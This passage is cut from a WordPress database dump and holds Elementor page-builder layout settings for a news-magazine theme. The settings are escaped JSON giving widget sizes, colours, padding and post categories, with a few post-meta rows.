size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1113,410,'_elementor_version','0.4'),(1114,410,'_elementor_css','a:3:{s:4:\"time\";i:1508854482;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1116,411,'_edit_last','1'),(1117,411,'_edit_lock','1509552292:1'),(1121,411,'_wp_page_template','default'),(1128,414,'_elementor_edit_mode','builder'),(1129,414,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"s